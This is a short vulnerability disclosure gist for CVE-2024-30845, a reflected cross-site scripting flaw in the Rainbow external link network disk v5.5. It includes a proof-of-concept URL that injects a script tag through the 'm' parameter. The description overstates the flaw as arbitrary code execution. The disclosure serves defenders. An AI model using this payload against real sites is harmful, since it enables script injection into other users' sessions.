Skip to content

Instantly share code, notes, and snippets.

@Zshan7que

Zshan7que/gist:c813f2b52daab08c9fb4f6c6b8178b66

Created April 7, 2024 07:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Zshan7que/c813f2b52daab08c9fb4f6c6b8178b66 to your computer and use it in GitHub Desktop.
Save Zshan7que/c813f2b52daab08c9fb4f6c6b8178b66 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-30845
Raw
gistfile1.txt
[cve id]
CVE-2024-30845
[product]
Rainbow external link network disk - v5.5
[vlun type]
xss
[description]
disk v.5.5 allows a remote attacker to execute arbitrary code via the
validation component of the input parameters.
[poc]
www.targeturl.com/index.php?m="/><script>alert(document.domain)</script>
[poc test]
https://github.com/netcccyun/pan/issues/6
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment